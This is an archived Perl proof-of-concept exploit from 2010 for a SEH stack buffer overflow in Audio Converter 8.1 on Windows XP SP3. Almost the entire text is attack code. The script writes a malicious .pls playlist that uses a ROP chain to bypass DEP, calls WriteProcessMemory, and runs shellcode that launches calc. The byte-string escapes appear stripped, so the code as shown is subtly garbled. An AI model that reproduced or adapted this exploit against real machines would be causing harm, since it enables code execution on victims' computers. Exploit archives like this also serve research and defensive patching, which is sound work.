audiocoverter-overflow.txt
Posted on 08 June 2010
#*********************************************************************************** # Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM # Date : 07/06/2010 # Author : Sud0 # Bug found by : chap0 # Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html # Version : 8.1 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Thanks to my wife for her support # Thanks for chap0 for bringing us the game # Greetz to: Corelan Security Team # mr_me you'r killing the ROP bro :) # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Using ROP to bypass DEP protection and call WPM #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #*********************************************************************************** #code : print "|------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]--| "; print "[+] Exploit for .... "; my $filename="newaudio.pls"; # Small Shellcode to run calc my $shellcode = "x8BxECx55x8BxECx68x20x20x20x2Fx68x63x61x6Cx63x8Dx45xF8x50xB8xC7x93xC2x77xFFxD0"; my $buffer = "A" x 280; # some junk $buffer .= "x31x2Ax00x10"; # mov eax,ebp / pop ebp / retn4 $buffer .= "B" x 12; # some junk $buffer .= "x1DxA4x07x10"; # add eax,100 / pop ebp / retn $buffer .= "B" x 8; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn $buffer .= "B" x 4 ; # some junk $buffer .= "x00x8Dx00x10"; # POP EDI / RETN $buffer .= "xB6x12x00x10"; # ADD ESP,4 / RETN $buffer .= "x05x21x00x10"; # ADD ESP,14 / RETN $buffer .= "B" x 20 ; # some junk $buffer .= "x79x84x02x10"; # mov dword ptr ss:[esp + 10], eax / call EDI $buffer .= "x13x22x80x7C"; # @ of WPM $buffer .= "xFFxFFxFFxFF"; # RET after WPM choose one and use it $buffer .= "xFFxFFxFFxFF"; # -1 : means process itself $buffer .= "xCFx22x80x7C"; # Destination address $buffer .= "B" x 4 ; # some junk, @ of shellcode will land here $buffer .= "x1Ax00x00x00"; # size of shellcode $buffer .= "x00xA0x45x00"; # Writeable memory $buffer .= "B" x 12; # some junk $buffer .= $shellcode; $buffer .= "B" x (4436 -length($buffer)); # some junk $buffer .= "x2Fx37x01x10"; # SEH : add esp, 878 / retn 8 $buffer .= "A" x 10000; # some junk print "Removing old $filename file "; system("del $filename"); print "Creating new $filename file "; open(FILE, ">$filename"); print FILE $buffer; close(FILE);
